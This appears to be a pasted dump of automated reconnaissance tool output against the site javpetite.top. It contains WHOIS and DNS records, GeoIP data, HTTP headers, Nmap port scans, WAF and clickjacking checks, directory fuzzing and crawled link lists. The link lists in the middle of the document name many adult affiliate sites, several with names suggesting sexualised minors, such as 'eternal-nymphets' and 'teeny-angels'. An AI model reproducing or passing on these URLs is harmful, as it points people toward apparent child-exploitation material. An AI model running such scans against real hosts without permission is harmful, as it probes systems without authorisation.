· 6 years ago · Oct 22, 2019, 10:38 AM
1#######################################################################################################################################
2=======================================================================================================================================
3Hostname www.javpetite.top ISP Host Sailor Ltd.
4Continent Europe Flag
5NL
6Country Netherlands Country Code NL
7Region North Holland Local time 22 Oct 2019 10:57 CEST
8City Amsterdam Postal Code 1091
9IP Address 185.82.200.52 Latitude 52.35
10 Longitude 4.917
11======================================================================================================================================
12#######################################################################################################################################
13> www.javpetite.top
14Server: 185.93.180.131
15Address: 185.93.180.131#53
16
17Non-authoritative answer:
18Name: www.javpetite.top
19Address: 185.82.200.52
20>
21#######################################################################################################################################
22Domain Name: javpetite.top
23Registry Domain ID: D20180629G10001G_60969699-top
24Registrar WHOIS Server: whois.namecheap.com
25Registrar URL: https://www.namecheap.com/
26Updated Date: 2018-06-28T18:01:18Z
27Creation Date: 2018-06-28T18:01:11Z
28Registry Expiry Date: 2021-06-28T18:01:11Z
29Registrar: Namecheap Inc.
30Registrar IANA ID: 1068
31Registrar Abuse Contact Email: abuse@namecheap.com
32Registrar Abuse Contact Phone: +1.6613102107
33Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
34#######################################################################################################################################
35[+] Target : www.javpetite.top
36
37[+] IP Address : 185.82.200.52
38
39[+] Headers :
40
41[+] Date : Tue, 22 Oct 2019 09:24:21 GMT
42[+] Server : Apache/2.4.10 (Debian)
43[+] Vary : Accept-Encoding
44[+] Content-Encoding : gzip
45[+] Content-Length : 655
46[+] Keep-Alive : timeout=5, max=100
47[+] Connection : Keep-Alive
48[+] Content-Type : text/html; charset=UTF-8
49
50[+] SSL Certificate Information :
51
52[+] organizationalUnitName : PositiveSSL
53[+] commonName : ygmt.info
54[+] countryName : GB
55[+] stateOrProvinceName : Greater Manchester
56[+] localityName : Salford
57[+] organizationName : COMODO CA Limited
58[+] commonName : COMODO RSA Domain Validation Secure Server CA
59[+] Version : 3
60[+] Serial Number : FD0AC3A33FCAF37C66E222C7581E08CC
61[+] Not Before : Feb 14 00:00:00 2017 GMT
62[+] Not After : Feb 14 23:59:59 2018 GMT
63[+] OCSP : ('http://ocsp.comodoca.com',)
64[+] subject Alt Name : (('DNS', 'ygmt.info'), ('DNS', 'www.ygmt.info'))
65[+] CA Issuers : ('http://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt',)
66[+] CRL Distribution Points : ('http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl',)
67
68[+] Whois Lookup :
69
70[+] NIR : None
71[+] ASN Registry : ripencc
72[+] ASN : 60117
73[+] ASN CIDR : 185.82.200.0/24
74[+] ASN Country Code : NL
75[+] ASN Date : 2014-12-31
76[+] ASN Description : HS, AE
77[+] cidr : 185.82.200.0/24
78[+] name : EU-HOSTSAILOR-20150101
79[+] handle : AF11712-RIPE
80[+] range : 185.82.200.0 - 185.82.200.255
81[+] description : HostSailor NL Services
82[+] country : NL
83[+] state : None
84[+] city : None
85[+] address : Suite No: 1605, Churchill Executive Tower, Burj Khalifa Area
86Dubai P.O. Box 98362
87United Arab Emirates
88[+] postal_code : None
89[+] emails : None
90[+] created : 2015-01-01T11:31:29Z
91[+] updated : 2015-01-01T11:31:29Z
92
93[+] Crawling Target...
94
95[+] Looking for robots.txt........[ Not Found ]
96[+] Looking for sitemap.xml.......[ Not Found ]
97[+] Extracting CSS Links..........[ 0 ]
98[+] Extracting Javascript Links...[ 0 ]
99[+] Extracting Internal Links.....[ 0 ]
100[+] Extracting External Links.....[ 0 ]
101[+] Extracting Images.............[ 0 ]
102
103[+] Total Links Extracted : 0
104
105[+] Completed!
106#######################################################################################################################################
107[+] Starting At 2019-10-22 05:24:43.040343
108[+] Collecting Information On: http://www.javpetite.top/reviews/index.html
109[#] Status: 200
110--------------------------------------------------
111[#] Web Server Detected: Apache/2.4.10 (Debian)
112[!] X-Frame-Options Headers not detect! target might be vulnerable Click Jacking
113- Date: Tue, 22 Oct 2019 09:24:43 GMT
114- Server: Apache/2.4.10 (Debian)
115- Last-Modified: Sat, 06 Apr 2019 21:32:33 GMT
116- ETag: "5c51-585e35757de40-gzip"
117- Accept-Ranges: bytes
118- Vary: Accept-Encoding
119- Content-Encoding: gzip
120- Content-Length: 3988
121- Keep-Alive: timeout=5, max=100
122- Connection: Keep-Alive
123- Content-Type: text/html
124--------------------------------------------------
125[#] Finding Location..!
126[#] status: success
127[#] country: Netherlands
128[#] countryCode: NL
129[#] region: NH
130[#] regionName: North Holland
131[#] city: Amsterdam
132[#] zip: 1091
133[#] lat: 52.35
134[#] lon: 4.9167
135[#] timezone: Europe/Amsterdam
136[#] isp: EU-HOSTSAILOR
137[#] org: HostSailor NL Services
138[#] as: AS60117 Host Sailor Ltd.
139[#] query: 185.82.200.52
140--------------------------------------------------
141[x] Didn't Detect WAF Presence on: http://www.javpetite.top/reviews/index.html
142--------------------------------------------------
143[#] Starting Reverse DNS
144[!] Found 2 any Domain
145- javpetite.top
146- ygmt.info
147--------------------------------------------------
148[!] Scanning Open Port
149[#] 22/tcp open ssh
150[#] 80/tcp open http
151[#] 443/tcp open https
152[#] 10000/tcp open snet-sensor-mgmt
153--------------------------------------------------
154[+] Collecting Information Disclosure!
155[#] Detecting sitemap.xml file
156[-] sitemap.xml file not Found!?
157[#] Detecting robots.txt file
158[-] robots.txt file not Found!?
159[#] Detecting GNU Mailman
160[-] GNU Mailman App Not Detected!?
161--------------------------------------------------
162[+] Crawling Url Parameter On: http://www.javpetite.top/reviews/index.html
163--------------------------------------------------
164[#] Searching Html Form !
165[-] No Html Form Found!?
166--------------------------------------------------
167[-] No DOM Paramter Found!?
168--------------------------------------------------
169[-] No internal Dynamic Parameter Found!?
170--------------------------------------------------
171[!] 31 External Dynamic Parameter Discovered
172[#] http://www.ygmt.info/in.php?id=63
173[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0002&PA=1984667&HTML=http://rikitake.com/
174[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0002&PA=1984667&HTML=http://rikitake.com/
175[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0002&PA=1984667&HTML=http://rikitake.com/
176[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0002&PA=1984667&HTML=http://rikitake.com/?193
177[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0000&PA=1984667&HTML=http://rikitake.com/?update/model-category/cId/3
178[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0000&PA=1984667&HTML=http://rikitake.com/?update/product-category/cId/9
179[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0000&PA=1984667&HTML=http://rikitake.com/?update/model-category/cId/10
180[#] http://hosted.met-art.com/Full_met-art_vol_116_205/?pa=1544909
181[#] http://www.hosted.mplstudios.com/galleries/08/alisa_angel_in_red/index.htm?affid=2190337
182[#] http://www.fm-teens.com/?gallhit/106991/1946/108/2/0
183[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0002&PA=1984667&HTML=http://rikitake.com/?148
184[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0000&PA=1984667&HTML=http://rikitake.com/?update/product-category/cId/1
185[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0000&PA=1984667&HTML=http://rikitake.com/?update/product-category/cId/10
186[#] http://hosted.met-art.com/Full_met-art_ALN_9_250/?pa=1544909
187[#] http://www.fm-teens.com/?gallhit/106991/1815/108/2/0
188[#] http://www.hosted.mplstudios.com/galleries/08/alisa_celestial_body/index.htm?affid=2190337
189[#] http://www.fm-teens.com/?gallhit/106991/1817/108/2/0
190[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0002&PA=1984667&HTML=http://rikitake.com/?140
191[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0000&PA=1984667&HTML=http://rikitake.com/?update/product-category/cId/5
192[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0000&PA=1984667&HTML=http://rikitake.com/?update/product-category/cId/13
193[#] http://hosted.met-art.com/Full_met-art_ERA_13_431/?pa=1544909
194[#] http://www.fm-teens.com/?gallhit/106991/1683/108/2/0
195[#] http://www.fm-teens.com/?gallhit/106991/1101/108/2/0
196[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=929542-0000&PA=1928100&HTML=http://www.justteensite.com/ccbill/
197[#] http://www.y-a-b.info/?groups.php?group=alt.binaries.pictures.sandra
198[#] http://www.y-a-b.info/?groups.php?group=alt.binaries.aoi&day=20090223
199[#] http://www.y-a-b.info/?groups.php?group=alt.binaries.japan.fashion.j-class
200[#] http://www.y-a-b.info/?top.php?t=toprating
201[#] http://www.y-a-b.info/?top.php?t=topclicks
202[#] http://www.y-a-b.info/?top.php?t=topfav
203--------------------------------------------------
204[-] No Internal Link Found!?
205--------------------------------------------------
206[!] 27 External links Discovered
207[#] http://www.imageport.org/portal01.html
208[#] http://latinpetite.ma.cx
209[#] http://www.eternal-nymphets.net/
210[#] http://gurugallerie.com
211[#] http://tdoll.top
212[#] http://tiny.ma.cx
213[#] http://www0.ma.cx
214[#] http://www.fm-teens.com
215[#] http://click.dtiserv2.com/Click2/1101019-101-us5905
216[#] http://click.dtiserv2.com/Click2/1354014-354-us5905
217[#] http://click.dtiserv2.com/Click2/2347001-347-us5905
218[#] http://www.bc-series.pw/
219[#] http://www.bc-series.pw/
220[#] http://www.bc-series.pw/
221[#] http://www.bc-series.pw/
222[#] http://www.bc-series.pw/
223[#] http://www.bc-series.pw/
224[#] http://click.dtiserv2.com/Direct/9006999-6-us5905/moviepages/102508-893/index.html
225[#] http://click.dtiserv2.com/Direct/9006999-6-us5905/moviepages/121308-933/index.html
226[#] http://click.dtiserv2.com/Direct/9006999-6-us5905/moviepages/121908-938/index.html
227[#] http://click.dtiserv2.com/Direct/9006999-6-us5905/moviepages/102408-313/index.html
228[#] http://click.dtiserv2.com/Direct/9006999-6-us5905/moviepages/101008-880/index.html
229[#] http://click.dtiserv2.com/Direct/9006999-6-us5905/moviepages/100108-872/index.html
230[#] http://click.dtiserv2.com/Direct/9006999-6-us5905/moviepages/090608-851/index.html
231[#] http://click.dtiserv2.com/Direct/9006999-6-us5905/moviepages/091308-857/index.html
232[#] http://click.dtiserv2.com/Click/2022002-22-us5905
233[#] http://www.imageport.org/portal02.html
234--------------------------------------------------
235[#] Mapping Subdomain..
236[!] Found 2 Subdomain
237- javpetite.top
238- www.javpetite.top
239--------------------------------------------------
240[!] Done At 2019-10-22 05:24:58.015083
241#######################################################################################################################################
242[i] Scanning Site: http://www.javpetite.top
243
244
245
246B A S I C I N F O
247====================
248
249
250[+] Site Title: Please wait ...
251[+] IP address: 185.82.200.52
252[+] Web Server: Apache/2.4.10 (Debian)
253[+] CMS: Could Not Detect
254[+] Cloudflare: Not Detected
255[+] Robots File: Could NOT Find robots.txt!
256
257
258
259
260W H O I S L O O K U P
261========================
262
263 Domain Name: javpetite.top
264Registry Domain ID: D20180629G10001G_60969699-top
265Registrar WHOIS Server: whois.namecheap.com
266Registrar URL: https://www.namecheap.com/
267Updated Date: 2018-06-28T18:01:18Z
268Creation Date: 2018-06-28T18:01:11Z
269Registry Expiry Date: 2021-06-28T18:01:11Z
270Registrar: Namecheap Inc.
271Registrar IANA ID: 1068
272Registrar Abuse Contact Email: abuse@namecheap.com
273Registrar Abuse Contact Phone: +1.6613102107
274Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
275Registry Registrant ID: C20180629C_31945908-top
276Registrant Name:
277Registrant Organization:
278Registrant Street:
279Registrant City:
280Registrant State/Province:
281Registrant Postal Code:
282Registrant Country:
283Registrant Phone:
284Registrant Phone Ext:
285Registrant Fax:
286Registrant Fax Ext:
287Registrant Email:
288Registry Admin ID: C20180629C_31945909-top
289Admin Name:
290Admin Organization:
291Admin Street:
292Admin City:
293Admin State/Province:
294Admin Postal Code:
295Admin Country:
296Admin Phone:
297Admin Phone Ext:
298Admin Fax:
299Admin Fax Ext:
300Admin Email:
301Registry Tech ID: C20180629C_31945910-top
302Tech Name:
303Tech Organization:
304Tech Street:
305Tech City:
306Tech State/Province:
307Tech Postal Code:
308Tech Country:
309Tech Phone:
310Tech Phone Ext:
311Tech Fax:
312Tech Fax Ext:
313Tech Email:
314Name Server: dns2.registrar-servers.com
315Name Server: dns1.registrar-servers.com
316DNSSEC: unsigned
317URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
318>>> Last update of WHOIS database: 2019-10-22T09:23:32Z <<<
319
320For more information on Whois status codes, please visit https://icann.org/epp
321
322
323
324
325
326
327G E O I P L O O K U P
328=========================
329
330[i] IP Address: 185.82.200.52
331[i] Country: Netherlands
332[i] State: North Holland
333[i] City: Amsterdam
334[i] Latitude: 52.35
335[i] Longitude: 4.9167
336
337
338
339
340H T T P H E A D E R S
341=======================
342
343
344[i] HTTP/1.1 200 OK
345[i] Date: Tue, 22 Oct 2019 09:24:40 GMT
346[i] Server: Apache/2.4.10 (Debian)
347[i] Vary: Accept-Encoding
348[i] Content-Length: 1162
349[i] Connection: close
350[i] Content-Type: text/html; charset=UTF-8
351
352
353
354
355D N S L O O K U P
356===================
357
358javpetite.top. 3600 IN SOA dns1.registrar-servers.com. hostmaster.registrar-servers.com. 2019030102 43200 3600 604800 3601
359javpetite.top. 1799 IN NS dns1.registrar-servers.com.
360javpetite.top. 1799 IN NS dns2.registrar-servers.com.
361javpetite.top. 1798 IN A 185.82.200.52
362javpetite.top. 1799 IN MX 10 eforward3.registrar-servers.com.
363javpetite.top. 1799 IN MX 10 eforward1.registrar-servers.com.
364javpetite.top. 1799 IN MX 20 eforward5.registrar-servers.com.
365javpetite.top. 1799 IN MX 15 eforward4.registrar-servers.com.
366javpetite.top. 1799 IN MX 10 eforward2.registrar-servers.com.
367javpetite.top. 1799 IN TXT "v=spf1 include:spf.efwd.registrar-servers.com ~all"
368
369
370
371
372S U B N E T C A L C U L A T I O N
373====================================
374
375Address = 185.82.200.52
376Network = 185.82.200.52 / 32
377Netmask = 255.255.255.255
378Broadcast = not needed on Point-to-Point links
379Wildcard Mask = 0.0.0.0
380Hosts Bits = 0
381Max. Hosts = 1 (2^0 - 0)
382Host Range = { 185.82.200.52 - 185.82.200.52 }
383
384
385
386N M A P P O R T S C A N
387============================
388
389Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-22 09:24 UTC
390Nmap scan report for javpetite.top (185.82.200.52)
391Host is up (0.079s latency).
392rDNS record for 185.82.200.52: latina.petite.guru
393
394PORT STATE SERVICE
39521/tcp closed ftp
39622/tcp open ssh
39723/tcp closed telnet
39880/tcp open http
399110/tcp closed pop3
400143/tcp closed imap
401443/tcp open https
4023389/tcp closed ms-wbt-server
403
404Nmap done: 1 IP address (1 host up) scanned in 0.62 seconds
405
406
407
408S U B - D O M A I N F I N D E R
409==================================
410
411
412[i] Total Subdomains Found : 1
413
414[+] Subdomain: www.javpetite.top
415[-] IP: 185.82.200.52
416#######################################################################################################################################
417[INFO] ------TARGET info------
418[*] TARGET: http://www.javpetite.top/reviews/index.html
419[*] TARGET IP: 185.82.200.52
420[INFO] NO load balancer detected for www.javpetite.top...
421[*] DNS servers: dns1.registrar-servers.com.
422[*] TARGET server: Apache/2.4.10 (Debian)
423[*] CC: NL
424[*] Country: Netherlands
425[*] RegionCode: NH
426[*] RegionName: North Holland
427[*] City: Amsterdam
428[*] ASN: AS60117
429[*] BGP_PREFIX: 185.82.200.0/24
430[*] ISP: HS Host Sailor Ltd., AE
431[INFO] DNS enumeration:
432[INFO] Possible abuse mails are:
433[*] abuse@hostsailor.com
434[*] abuse@javpetite.top
435[*] abuse@www.javpetite.top
436[INFO] NO PAC (Proxy Auto Configuration) file FOUND
437[INFO] Checking for HTTP status codes recursively from /reviews/index.html
438[INFO] Status code Folders
439[*] 403 http://www.javpetite.top/reviews/
440[INFO] Starting FUZZing in http://www.javpetite.top/FUzZzZzZzZz...
441[INFO] Status code Folders
442[ALERT] Look in the source code. It may contain passwords
443[INFO] Links found from http://www.javpetite.top/reviews/index.html http://185.82.200.52/:
444[*] http://185.82.200.52/www.met-art.com/2000/annette/index.htm
445[*] http://185.82.200.52/www.met-art.com/2000/gal_alejul/index.htm
446[*] http://185.82.200.52/www.met-art.com/2000/gal_anna/index887.htm
447[*] http://185.82.200.52/www.met-art.com/2000/gal_anna/index.htm
448[*] http://185.82.200.52/www.met-art.com/2000/gal_av_andrea_inna/index.htm
449[*] http://185.82.200.52/www.met-art.com/2000/gal_wings/index.htm
450[*] http://185.82.200.52/www.met-art.com/2000/juliamm/index.htm
451[*] http://185.82.200.52/www.met-art.com/2000/nocturna/index.htm
452[*] http://185.82.200.52/www.met-art.com/c32/120403.htm
453[*] http://185.82.200.52/www.met-art.com/c32/120503.htm
454[*] http://185.82.200.52/www.met-art.com/c32/120603_2.htm
455[*] http://185.82.200.52/www.met-art.com/c32/120603.htm
456[*] http://185.82.200.52/www.met-art.com/c32/120703_2.htm
457[*] http://185.82.200.52/www.met-art.com/c32/120703.htm
458[*] http://185.82.200.52/www.met-art.com/gallery031803/index87.htm
459[*] http://185.82.200.52/www.met-art.com/gallery031803/index.htm
460[*] http://185.82.200.52/www.met-art.com/ngal04/indexrrits.htm
461[*] http://185.82.200.52/www.met-art.com/ngal04/indexrrits.htm.htm
462[*] http://a.b.pictures.teeny-angels.net/freearchive.php
463[*] http://alt.binaries.pictures.bcseries.org/
464[*] http://click.dtiserv2.com/Click/2022002-22-us5905
465[*] http://click.dtiserv2.com/Click2/1101019-101-us5905
466[*] http://click.dtiserv2.com/Click2/1354014-354-us5905
467[*] http://click.dtiserv2.com/Click2/2347001-347-us5905
468[*] http://click.dtiserv2.com/Direct/9006999-6-us5905/moviepages/090608-851/index.html
469[*] http://click.dtiserv2.com/Direct/9006999-6-us5905/moviepages/091308-857/index.html
470[*] http://click.dtiserv2.com/Direct/9006999-6-us5905/moviepages/100108-872/index.html
471[*] http://click.dtiserv2.com/Direct/9006999-6-us5905/moviepages/101008-880/index.html
472[*] http://click.dtiserv2.com/Direct/9006999-6-us5905/moviepages/102408-313/index.html
473[*] http://click.dtiserv2.com/Direct/9006999-6-us5905/moviepages/102508-893/index.html
474[*] http://click.dtiserv2.com/Direct/9006999-6-us5905/moviepages/121308-933/index.html
475[*] http://click.dtiserv2.com/Direct/9006999-6-us5905/moviepages/121908-938/index.html
476[*] http://gurugallerie.com/
477[*] http://hosted.met-art.com/Full_met-art_ALN_9_250/?pa=1544909
478[*] http://hosted.met-art.com/Full_met-art_ERA_13_431/?pa=1544909
479[*] http://hosted.met-art.com/Full_met-art_vol_116_205/?pa=1544909
480[*] http://hosted.met-art.com/generated_gallery/hosted/10141/10141.htm?CA=901313-0000&pa=996317
481[*] http://hosted.met-art.com/generated_gallery/hosted/10142/10142.htm?CA=901313-0000&pa=996317
482[*] http://hosted.met-art.com/generated_gallery/hosted/10143/10143.htm?CA=901313-0000&pa=996317
483[*] http://hosted.met-art.com/generated_gallery/hosted/10144/10144.htm?CA=901313-0000&pa=996317
484[*] http://hosted.met-art.com/generated_gallery/hosted/10145/10145.htm?CA=901313-0000&pa=996317
485[*] http://hosted.met-art.com/generated_gallery/hosted/10146/10146.htm?CA=901313-0000&pa=996317
486[*] http://hosted.met-art.com/generated_gallery/hosted/10146/434fdf4re.html?CA=901313-0000&pa=996317
487[*] http://hosted.met-art.com/generated_gallery/hosted/10146/5434eresre.html?CA=901313-0000&pa=996317
488[*] http://hosted.met-art.com/generated_gallery/hosted/10146/5434fdf4re.html?CA=901313-0000&pa=996317
489[*] http://hosted.met-art.com/generated_gallery/hosted/8209/8209.html?CA=901313-0000&pa=996317
490[*] http://hosted.met-art.com/generated_gallery/hosted/8210/8210.html?CA=901313-0000&pa=996317
491[*] http://hosted.met-art.com/generated_gallery/hosted/8211/8211.html?CA=901313-0000&pa=996317
492[*] http://hosted.met-art.com/generated_gallery/hosted/8212/8212.html?CA=901313-0000&pa=996317
493[*] http://hosted.met-art.com/generated_gallery/hosted/crystal/index.htm?CA=901313-0000&pa=996317
494[*] http://hosted.met-art.com/generated_gallery/hosted/gocce/index.htm?CA=901313-0000&pa=996317
495[*] http://hosted.met-art.com/generated_gallery/hosted/Itaca/index.htm?CA=901313-0000&pa=996317
496[*] http://hosted.met-art.com/generated_gallery/hosted/Liza/index.htm?CA=901313-0000&pa=996317
497[*] http://hosted.met-art.com/generated_gallery/hosted/mixed/index.htm?CA=901313-0000&pa=996317
498[*] http://hosted.met-art.com/generated_gallery/hosted/sasha/index.htm?CA=901313-0000&pa=996317
499[*] http://hosted.met-art.com/hosted/1245.htm?CA=901313-0000&pa=996317
500[*] http://hosted.met-art.com/hosted/4we4334.htm?CA=901313-0000&pa=996317
501[*] http://hosted.met-art.com/hosted/a45456.htm?CA=901313-0000&pa=996317
502[*] http://hosted.met-art.com/hosted/df43rdwe.htm?CA=901313-0000&pa=996317
503[*] http://hosted.met-art.com/hosted/fcdf43r42.htm?CA=901313-0000&pa=996317
504[*] http://hosted.met-art.com/hosted/fds43532.htm?CA=901313-0000&pa=996317
505[*] http://hosted.met-art.com/hosted/ff34e4543.htm?CA=901313-0000&pa=996317
506[*] http://hosted.met-art.com/hosted/kuyrter.htm?CA=901313-0000&pa=996317
507[*] http://hosted.met-art.com/hosted/z344532.htm?CA=901313-0000&pa=996317
508[*] http://latinpetite.ma.cx/
509[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=929542-0000&PA=1928100&HTML=http://www.justteensite.com/ccbill/
510[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0000&PA=1984667&HTML=http://rikitake.com/?update/model-category/cId/10
511[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0000&PA=1984667&HTML=http://rikitake.com/?update/model-category/cId/3
512[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0000&PA=1984667&HTML=http://rikitake.com/?update/product-category/cId/1
513[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0000&PA=1984667&HTML=http://rikitake.com/?update/product-category/cId/10
514[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0000&PA=1984667&HTML=http://rikitake.com/?update/product-category/cId/13
515[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0000&PA=1984667&HTML=http://rikitake.com/?update/product-category/cId/5
516[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0000&PA=1984667&HTML=http://rikitake.com/?update/product-category/cId/9
517[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0002&PA=1984667&HTML=http://rikitake.com/
518[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0002&PA=1984667&HTML=http://rikitake.com/?140
519[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0002&PA=1984667&HTML=http://rikitake.com/?148
520[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0002&PA=1984667&HTML=http://rikitake.com/?193
521[*] https://alt.binaries.pictures.bcseries.org/
522[*] http://tdoll.top/
523[*] http://tiny.ma.cx/
524[*] http://www0.ma.cx/
525[*] http://www.bc-series.pw/
526[*] http://www.eternal-nymphets.net/
527[*] http://www.fm-teens.com/
528[*] http://www.fm-teens.com/?gallhit/106991/1101/108/2/0
529[*] http://www.fm-teens.com/?gallhit/106991/1683/108/2/0
530[*] http://www.fm-teens.com/?gallhit/106991/1815/108/2/0
531[*] http://www.fm-teens.com/?gallhit/106991/1817/108/2/0
532[*] http://www.fm-teens.com/?gallhit/106991/1946/108/2/0
533[*] http://www.hosted.mplstudios.com/galleries/08/alisa_angel_in_red/index.htm?affid=2190337
534[*] http://www.hosted.mplstudios.com/galleries/08/alisa_celestial_body/index.htm?affid=2190337
535[*] http://www.imageport.info/
536[*] http://www.imageport.info/portal01.html
537[*] http://www.imageport.org/portal01.html
538[*] http://www.imageport.org/portal02.html
539[*] http://www.javpetite.top/reviews/fm.html
540[*] http://www.javpetite.top/reviews/met.html
541[*] http://www.javpetite.top/reviews/mpl.html
542[*] http://www.javpetite.top/reviews/rikitake_new.php
543[*] http://www.mclt.net/
544[*] http://www.met-art.nymphs.net.tf/
545[*] http://www.mmaaxx.com/index8.html?affid=us5905
546[*] http://www.mmaaxx.com/table/sogo/index14.html?affid=us5905
547[*] http://www.my-usenet.com/
548[*] http://www.nozomis.com/
549[*] http://www.nymphs.us/
550[*] http://www.photo50.com/
551[*] http://www.ppc-direct.com/index16.html?affid=us5905
552[*] http://www.sweet-angels.asia/
553[*] http://www.teen-beauty.com/01105/223rr9.html?CA=901313-0000&pa=996317
554[*] http://www.teen-beauty.com/01105/232432dds.html?CA=901313-0000&pa=996317
555[*] http://www.teen-beauty.com/01105/324232d9.html?CA=901313-0000&pa=996317
556[*] http://www.teen-beauty.com/01105/3423232d9.html?CA=901313-0000&pa=996317
557[*] http://www.teen-beauty.com/01105/43945342.html?CA=901313-0000&pa=996317
558[*] http://www.teen-beauty.com/01105/4432d9.html?CA=901313-0000&pa=996317
559[*] http://www.teen-beauty.com/01105/asaere4.html?CA=901313-0000&pa=996317
560[*] http://www.teen-beauty.com/01105/dopfdorter.html?CA=901313-0000&pa=996317
561[*] http://www.teen-beauty.com/01105/ff43434fsd.html?CA=901313-0000&pa=996317
562[*] http://www.teen-beauty.com/01105/zjukui87.html?CA=901313-0000&pa=996317
563[*] http://www.y-a-b.info/?groups.php?group=alt.binaries.aoi&day=20090223
564[*] http://www.y-a-b.info/?groups.php?group=alt.binaries.japan.fashion.j-class
565[*] http://www.y-a-b.info/?groups.php?group=alt.binaries.pictures.sandra
566[*] http://www.y-a-b.info/?top.php?t=topclicks
567[*] http://www.y-a-b.info/?top.php?t=topfav
568[*] http://www.y-a-b.info/?top.php?t=toprating
569[*] http://www.y-a-b.net/
570[*] http://www.ygmt.info/in.php?id=63
571[INFO] GOOGLE has 1,420,000 results (0.18 seconds) about http://www.javpetite.top/
572[INFO] Shodan detected the following opened ports on 185.82.200.52:
573[*] 10000
574[*] 443
575[*] 80
576[INFO] ------VirusTotal SECTION------
577[INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address:
578[INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset:
579[INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided:
580[INFO] ------Alexa Rank SECTION------
581[INFO] Percent of Visitors Rank in Country:
582[INFO] Percent of Search Traffic:
583[INFO] Percent of Unique Visits:
584[INFO] Total Sites Linking In:
585[*] Total Sites
586[INFO] Useful links related to www.javpetite.top - 185.82.200.52:
587[*] https://www.virustotal.com/pt/ip-address/185.82.200.52/information/
588[*] https://www.hybrid-analysis.com/search?host=185.82.200.52
589[*] https://www.shodan.io/host/185.82.200.52
590[*] https://www.senderbase.org/lookup/?search_string=185.82.200.52
591[*] https://www.alienvault.com/open-threat-exchange/ip/185.82.200.52
592[*] http://pastebin.com/search?q=185.82.200.52
593[*] http://urlquery.net/search.php?q=185.82.200.52
594[*] http://www.alexa.com/siteinfo/www.javpetite.top
595[*] http://www.google.com/safebrowsing/diagnostic?site=www.javpetite.top
596[*] https://censys.io/ipv4/185.82.200.52
597[*] https://www.abuseipdb.com/check/185.82.200.52
598[*] https://urlscan.io/search/#185.82.200.52
599[*] https://github.com/search?q=185.82.200.52&type=Code
600[INFO] Useful links related to AS60117 - 185.82.200.0/24:
601[*] http://www.google.com/safebrowsing/diagnostic?site=AS:60117
602[*] https://www.senderbase.org/lookup/?search_string=185.82.200.0/24
603[*] http://bgp.he.net/AS60117
604[*] https://stat.ripe.net/AS60117
605[INFO] Date: 22/10/19 | Time: 05:26:05
606[INFO] Total time: 1 minute(s) and 18 second(s)
607#######################################################################################################################################
608Trying "javpetite.top"
609;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 33315
610;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 2, ADDITIONAL: 3
611
612;; QUESTION SECTION:
613;javpetite.top. IN ANY
614
615;; ANSWER SECTION:
616javpetite.top. 1800 IN TXT "v=spf1 include:spf.efwd.registrar-servers.com ~all"
617javpetite.top. 1800 IN MX 15 eforward4.registrar-servers.com.
618javpetite.top. 1800 IN MX 10 eforward1.registrar-servers.com.
619javpetite.top. 1800 IN MX 10 eforward3.registrar-servers.com.
620javpetite.top. 1800 IN MX 10 eforward2.registrar-servers.com.
621javpetite.top. 1800 IN MX 20 eforward5.registrar-servers.com.
622javpetite.top. 1799 IN A 185.82.200.52
623javpetite.top. 3601 IN SOA dns1.registrar-servers.com. hostmaster.registrar-servers.com. 2019030102 43200 3600 604800 3601
624javpetite.top. 1800 IN NS dns1.registrar-servers.com.
625javpetite.top. 1800 IN NS dns2.registrar-servers.com.
626
627;; AUTHORITY SECTION:
628javpetite.top. 1800 IN NS dns2.registrar-servers.com.
629javpetite.top. 1800 IN NS dns1.registrar-servers.com.
630
631;; ADDITIONAL SECTION:
632dns1.registrar-servers.com. 735 IN A 216.87.155.33
633dns1.registrar-servers.com. 707 IN AAAA 2620:74:19::33
634dns2.registrar-servers.com. 10215 IN A 216.87.152.33
635
636Received 434 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 213 ms
637#######################################################################################################################################
638; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> +trace javpetite.top
639;; global options: +cmd
640. 81963 IN NS k.root-servers.net.
641. 81963 IN NS j.root-servers.net.
642. 81963 IN NS h.root-servers.net.
643. 81963 IN NS g.root-servers.net.
644. 81963 IN NS a.root-servers.net.
645. 81963 IN NS l.root-servers.net.
646. 81963 IN NS f.root-servers.net.
